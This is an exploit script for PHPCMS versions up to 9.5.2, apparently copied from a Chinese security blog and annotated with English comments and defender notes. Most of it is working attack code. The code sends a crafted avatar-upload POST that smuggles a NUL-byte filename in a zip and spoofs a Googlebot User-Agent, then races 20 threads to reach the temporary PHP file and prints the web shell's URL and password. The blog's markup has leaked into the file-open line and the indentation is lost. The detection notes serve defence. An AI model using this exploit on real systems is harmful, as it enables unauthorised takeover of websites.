
PHPCMS最新Getshell代码Exp,通杀<=v9.5.2所有版本

#coding=GB2312
#Date: 2014-01-11 23:50
#Created by felixk3y
#Name: PHPCMS <=V9.5.2 Arbitrary File Upload Exploit...
#Blog: [url]http://weibo.com/rootsafe[/url]

import os
import sys
import socket
import urllib
import urllib2
import threading
import msvcrt

# Target-specific constants (the original author's notes, translated):
# postu:   URL path that receives the file-upload POST
# shell:   URL path where the resulting file is expected to be reachable
# tmpfile: URL path of the temporary file created by the upload
# dvalue:  value of the avatar-upload `data` parameter
# The author states that postu, shell, tmpfile and dvalue are adjusted per
# target, and that with the bundled phpcms.zip only tmpfile and dvalue change.
# NOTE(review): dvalue is an opaque blob; its encoding cannot be determined
# from this file, and nothing here validates it — it is sent as-is.
# Defender note: the fixed paths below (/phpsso_server/index.php and the
# uploadfile/avatar/ tree) are the stable access-log / WAF signature of this
# tool; a .php request under uploadfile/avatar/ should never be legitimate.
postu = '/phpsso_server/index.php'
shell = '/phpsso_server/uploadfile/shell.php'
tmpfile = '/phpsso_server/uploadfile/avatar/1/1/1/1.php'
dvalue = '3f84AABWUlIDVAFSUwRTVA9QVwRRUAFXAFcLUFNMWgYKAENAQzkDF0cMbgkGTlsAXQdlJQIJCEVqAE5mMUhUJ28FJHV8ABcgXCN5NS5ZNQ'

# Worker thread (exploit() starts 20 of them): alternates between sending the
# prebuilt raw POST and GET-probing the temporary upload path. The interleaving
# and the author's "don't use too few threads" remark suggest the technique
# depends on timing — inferred from the structure, not stated in the code.
# Defender note: the observable pattern is one client issuing a burst of GETs
# for a .php path under uploadfile/avatar/ interleaved with POSTs that carry a
# Googlebot User-Agent; that combination is cheap to alert on.
# (Source as printed has lost its indentation; lines are kept verbatim.)
class upload(threading.Thread):
# num / loop: attempt counters used only for progress output.
# host: base URL including scheme. header: the complete raw HTTP request
# (headers and body) as one string. tmpfile / shell: URL paths, prefixed
# with host here.
def __init__(self,num,loop,host,header,tmpfile,shell):
threading.Thread.__init__(self)
self.num = num
self.loop = loop
self.host = host
self.header = header
self.shell = '%s%s' % (host,shell)
self.tmpfile = '%s%s' % (host,tmpfile)

# Never returns: `while True` has no break, so the process only ends through
# ThreadStop's os._exit(). Each round is 2 probe GETs, then 10 (POST + probe)
# pairs, then 10 more probe GETs; self.num is reset to 1 between phases.
def run(self):
while True:
print '正在进行第%d轮尝试...\n' % self.loop  # "starting round %d"
while(self.num<3):
print '正在进行第%d次尝试访问临时文件...' % self.num  # "attempt %d to reach the temp file"
self._get(self.tmpfile)
self.num += 1
self.num = 1
while(self.num<11):
print '正在进行第%d次提交ZIP数据包同时试访问临时文件...' % self.num  # "attempt %d: send ZIP and probe the temp file"
self.send_socket(self.host,self.header)
self._get(self.tmpfile)
self.num += 1
self.num = 1
while(self.num<11):
print '正在进行第%d次尝试访问临时文件...' % self.num  # "attempt %d to reach the temp file"
self._get(self.tmpfile)
self.num += 1
self.loop += 1
self.num = 1

# GET the temp-file URL. A 200 is treated as success and the shell URL is
# printed; the exit after it is commented out, so run() keeps looping after
# a hit. Only urllib2.HTTPError (e.g. a 404) is swallowed here.
def _get(self,tmpfile):
try:
response = urllib2.urlopen(tmpfile)
if response.getcode() == 200:
print '\nSuccess!\nShell: %s\nPass is [1@3].' % self.shell
#os._exit(1)
except urllib2.HTTPError,e:
pass

# Send the raw request over a plain TCP socket to port 80 (no TLS, port is
# hard-coded) and close without reading the reply. When host carries a
# scheme, the netloc is extracted by splitting on '/'.
def send_socket(self,host,headers):
if 'http://' in host:
host = host.split('/')[2]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, 80))
sock.send(headers)
sock.close()

# Keyboard watchdog. Blocks on msvcrt.getch(), a Windows-only module, so the
# script as written cannot run on other platforms. Pressing 'q' — or any
# exception raised by getch() — ends the whole process with os._exit(1),
# which is the only exit path because the upload threads never return.
class ThreadStop(threading.Thread):
def run(self):
try:
chr = msvcrt.getch()  # shadows the builtin chr(); harmless in this scope
if chr == 'q':
print "stopped by your action( q )."
os._exit(1)
except:  # bare except: any failure reading stdin also terminates the process
os._exit(1)

# Print the usage text and exit with status 0. The "[url]...[/url]" inside the
# second literal looks like BBCode inserted by the hosting blog rather than
# part of the original script (the same tags appear in the header comments).
def usage():
print '\n\tUsage: upload-exp.py '
print '\n\tExp: upload-exp.py [url]www.vulns.org[/url] cookie'
os._exit(0)

# Convert a hex string to the single character with that code point
# (float.fromhex parses the hex text, int() truncates, '{:c}' formats it).
# The only call in this file passes '00', which yields a NUL byte.
def hex_to_asc(ch):
ch = int(float.fromhex(ch))
return '{:c}'.format(ch)

# Read an archive from disk and replace every 'php.php' in its raw bytes with
# 'php\x00php' — presumably an entry name inside the zip, but the archive
# itself is not on this page, so that is unverified.
# As printed, the open() literal contains an HTML anchor inserted by the
# blog's tag auto-linker, so this line cannot open any file verbatim.
# Defender note: a NUL byte inside an archive entry name is the telltale;
# rejecting entry names that contain control characters before extraction,
# and never deriving the on-disk extension from the untrusted name, removes
# this whole class of truncation trick.
def post_data():
postdata = ''
asc = hex_to_asc('00')
repstr = 'php%sphp' % asc
fps = open('<a href="http://www.1004619.com/tag/phpcms/" title="查看更多关于phpcms的文章" target="_blank">phpcms</a>.zip','rb')  # handle is never closed
for sbin in fps.readlines():  # binary file split at '\n'; pieces are simply re-joined below
postdata += sbin
postdata = postdata.replace('php.php',repstr)
return postdata

# Entry point: reads host and cookie from argv, builds one raw HTTP/1.1 POST
# (headers plus the archive body) by string concatenation, then starts the
# keyboard watchdog and 20 upload workers sharing that same request string.
# Defender notes, all visible in the request built below: a POST with a
# "Googlebot/2.1" User-Agent and Content-Type application/octet-stream to
# index.php?m=phpsso&c=index&a=uploadavatar. Real crawlers do not POST, so the
# User-Agent/method pair alone is a strong signal, and the uploadavatar action
# with an octet-stream body is the request-level signature of this tool.
# The Cookie header is sent exactly as given on the command line.
def exploit():
num = 1
loop = 1
threads = []
host = sys.argv[1]
cookie = sys.argv[2]
if 'http://' not in host:
host = 'http://%s' % host

postdata = post_data()
mhost = host.split('/')[2]  # netloc, used for the Host header

params = 'm=phpsso&c=index&a=uploadavatar&auth_data=v=1&appid=1&data=%s' % dvalue
posturl = '%s?%s' % (postu,params)
header = 'POST %s HTTP/1.1\r\n' % posturl
header += 'Host: %s\r\n' % mhost
header += 'User-Agent: Googlebot/2.1 (+[url]http://www.google.com/bot.html[/url])\r\n'  # "[url]" tags look like blog-injected BBCode
header += 'Content-Type: application/octet-stream\r\n'
header += 'Accept-Encoding: gzip,deflate,sdch\r\n'
header += 'Content-Length: %d\r\n' % len(postdata)
header += 'Cookie: %s\r\n\r\n' % cookie
header += '%s\r\n' % postdata

shouhu = ThreadStop()
shouhu.setDaemon(True)
shouhu.start()

for i in range(20):  # author's comment: the thread count should not be too small
t = upload(num,loop,host,header,tmpfile,shell)
t.start()
threads.append(t)
for th in threads:
t.join()  # joins `t` (the last thread started) each time; `th` is unused

# Script entry. usage() is shown only when no argument at all is supplied;
# exploit() itself reads sys.argv[2] for the cookie.
if __name__ == "__main__":
if len(sys.argv) < 2:
usage()
exploit()